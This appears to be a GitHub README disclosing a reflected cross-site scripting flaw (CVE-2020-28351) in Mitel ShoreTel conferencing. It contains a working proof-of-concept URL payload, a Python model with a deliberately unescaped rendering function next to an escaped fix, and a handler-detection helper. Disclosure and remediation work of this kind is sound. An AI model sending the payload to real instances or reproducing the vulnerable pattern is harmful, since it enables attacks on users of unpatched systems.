dievus/CVE-2020-28351
ShoreTel 19.46.1802.0 Reflected Cross Site Scripting Attack

The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page.

Proof-of-concept URL path (everything after index.php up to the query string is passed to the script as PATH_INFO):

/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME

The vulnerability is in the HOME_MEETING& page, which renders the time_zone dropdown. The PATH_INFO value is reflected into the page without HTML escaping, so the URL-encoded double quote (%22) closes the attribute it lands in and the rest of the payload adds an onmouseover= event handler. No authentication is required to reach the page, and the alert fires when the victim moves the mouse over the dropdown menu object, which is what makes the reflected XSS exploitable by sending the crafted link to a user.
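The following is an added example written for this README, not code from the ShoreTel product or from the advisory author. It models the bug class the payload exploits: a server that reflects its own request path (PATH_INFO included) into a double-quoted HTML attribute without escaping. The template strings, the assumption that the reflection happens in the action attribute of the form wrapping the time_zone dropdown, and the use of Python rather than PHP are all stand-ins chosen for the example; the real page layout is not known from the advisory. The injected_handlers helper is generic and can be run over a real response body to verify the same thing against a live instance.

```python
# Added example for this README; not ShoreTel/Mitel code and not the
# advisory author's tooling. The templates below are a hypothetical
# stand-in for the page that renders the time_zone dropdown, constructed
# to show the attribute-context injection the PoC payload relies on.
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# PATH_INFO portion of the advisory's PoC URL, i.e. what follows "index.php"
# in /index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME
POC_PATH_INFO = "/%22%20onmouseover=alert(document.domain)%20"


def render_vulnerable(path_info: str) -> str:
    """Hypothetical vulnerable rendering: the request's own path (including
    PATH_INFO) is URL-decoded by the server and concatenated into a quoted
    attribute of the form that wraps the time_zone dropdown, unescaped."""
    decoded = unquote(path_info)
    return (
        f'<form action="/index.php{decoded}?page=HOME_MEETING&">'
        '<select name="time_zone"><option>UTC</option></select>'
        "</form>"
    )


def render_fixed(path_info: str) -> str:
    """Same template with attribute-context escaping: html.escape with
    quote=True turns the injected double quote into &quot;, so the value
    can no longer close the attribute and smuggle new ones in."""
    decoded = unquote(path_info)
    safe = escape(decoded, quote=True)
    return (
        f'<form action="/index.php{safe}?page=HOME_MEETING&">'
        '<select name="time_zone"><option>UTC</option></select>'
        "</form>"
    )


class _HandlerFinder(HTMLParser):
    """Records every on* event-handler attribute a tag ends up with; that is
    what matters, since a browser fires them regardless of how they got there."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower(), value or ""))


def injected_handlers(html: str) -> list[tuple[str, str, str]]:
    """Return (tag, attribute, value) for each event handler in the markup.
    Feed it a fetched response body to check a live instance the same way."""
    finder = _HandlerFinder()
    finder.feed(html)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    vuln = render_vulnerable(POC_PATH_INFO)
    print(vuln)
    print(injected_handlers(vuln))   # form gains an onmouseover handler
    fixed = render_fixed(POC_PATH_INFO)
    print(fixed)
    print(injected_handlers(fixed))  # [] : the quote is now &quot;
```

The mouseover handler lands on the form, not the select itself, yet still fires when the dropdown is hovered because mouseover events bubble up to ancestors; that matches the advisory's observation that the payload triggers on the dropdown menu object. The fix is attribute-context escaping of every reflected value (in PHP, htmlspecialchars with ENT_QUOTES on anything derived from $_SERVER), not filtering of the word "onmouseover".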

Discovered by Joe Helle, November 2020. CVE ID assigned 8 November 2020.

See the CVE listed here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28351
